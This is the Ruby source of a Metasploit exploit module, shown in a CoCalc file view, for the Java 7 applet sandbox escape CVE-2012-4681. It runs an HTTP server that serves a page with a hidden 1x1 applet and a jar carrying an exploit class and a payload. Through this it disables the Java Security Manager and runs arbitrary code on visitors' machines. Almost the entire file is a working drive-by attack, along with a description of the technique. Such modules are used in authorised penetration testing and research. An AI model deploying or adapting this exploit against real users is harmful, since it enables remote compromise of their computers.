CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10

11
  #include Msf::Exploit::Remote::BrowserAutopwn
12
  #autopwn_info({ :javascript => false })
13

14
  def initialize( info = {} )
15
    super( update_info( info,
16
      'Name'          => 'Java 7 Applet Remote Code Execution',
17
      'Description'   => %q{
18
        The exploit takes advantage of two issues in JDK 7: The ClassFinder and
19
        MethodFinder.findMethod().  Both were newly introduced in JDK 7.  ClassFinder is a
20
        replacement for classForName back in JDK 6. It allows untrusted code to obtain a
21
        reference and have access to a restricted package in JDK 7, which can be used to
22
        abuse sun.awt.SunToolkit (a restricted package).  With sun.awt.SunToolkit, we can
23
        actually invoke getField() by abusing findMethod() in Statement.invokeInternal()
24
        (but getField() must be public, and that's not always the case in JDK 6) in order
25
        to access Statement.acc's private field, modify AccessControlContext, and then
26
        disable Security Manager. Once Security Manager is disabled, we can execute
27
        arbitrary Java code.
28

29
        Our exploit has been tested successfully against multiple platforms, including:
30
        IE, Firefox, Safari, Chrome; Windows, Ubuntu, OS X, Solaris, etc.
31
      },
32
      'License'       => MSF_LICENSE,
33
      'Author'        =>
34
        [
35
          'Adam Gowdiak',  # Vulnerability discovery according to Oracle's advisory
36
          'James Forshaw', # Vulnerability discovery according to Oracle's advisory
37
          'jduck',         # metasploit module
38
          'sinn3r',        # metasploit module
39
          'juan vazquez'   # metasploit module
40
        ],
41
      'References'    =>
42
        [
43
          [ 'CVE', '2012-4681' ],
44
          [ 'OSVDB', '84867' ],
45
          [ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ],
46
          [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html' ],
47
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2012/new-java-0day-exploited-in-the-wild/' ],
48
          [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ],
49
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html' ],
50
          [ 'URL', 'https://www.rapid7.com/blog/post/2012/08/27/lets-start-the-week-with-a-new-java-0day' ],
51
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=852051']
52
        ],
53
      'Platform'      => %w{ java linux win },
54
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
55
      'Targets'       =>
56
        [
57
          [ 'Generic (Java Payload)',
58
            {
59
              'Arch' => ARCH_JAVA,
60
              'Platform' => 'java'
61
            }
62
          ],
63
          [ 'Windows Universal',
64
            {
65
              'Arch' => ARCH_X86,
66
              'Platform' => 'win'
67
            }
68
          ],
69
          [ 'Linux x86',
70
            {
71
              'Arch' => ARCH_X86,
72
              'Platform' => 'linux'
73
            }
74
          ]
75
        ],
76
      'DefaultTarget'  => 0,
77
      'DisclosureDate' => '2012-08-26'
78
      ))
79
  end
80

81

82
  def on_request_uri( cli, request )
83

84
    if not request.uri.match(/\.jar$/i)
85
      if not request.uri.match(/\/$/)
86
        send_redirect(cli, get_resource() + '/', '')
87
        return
88
      end
89

90
      print_status("#{self.name} handling request")
91

92
      send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
93
      return
94
    end
95

96
    paths = [
97
      [ "Exploit.class" ]
98
    ]
99

100
    p = regenerate_payload(cli)
101

102
    jar  = p.encoded_jar
103
    paths.each do |path|
104
      1.upto(path.length - 1) do |idx|
105
        full = path[0,idx].join("/") + "/"
106
        if !(jar.entries.map{|e|e.name}.include?(full))
107
          jar.add_file(full, '')
108
        end
109
      end
110
      fd = File.open(File.join( Msf::Config.data_directory, "exploits", "CVE-2012-4681", path ), "rb")
111
      data = fd.read(fd.stat.size)
112
      jar.add_file(path.join("/"), data)
113
      fd.close
114
    end
115

116
    print_status("Sending Applet.jar")
117
    send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
118

119
    handler( cli )
120
  end
121

122
  def generate_html
123
    html  = "<html><head></head>"
124
    html += "<body>"
125
    html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
126
    html += "</applet></body></html>"
127
    return html
128
  end
129
end
130

131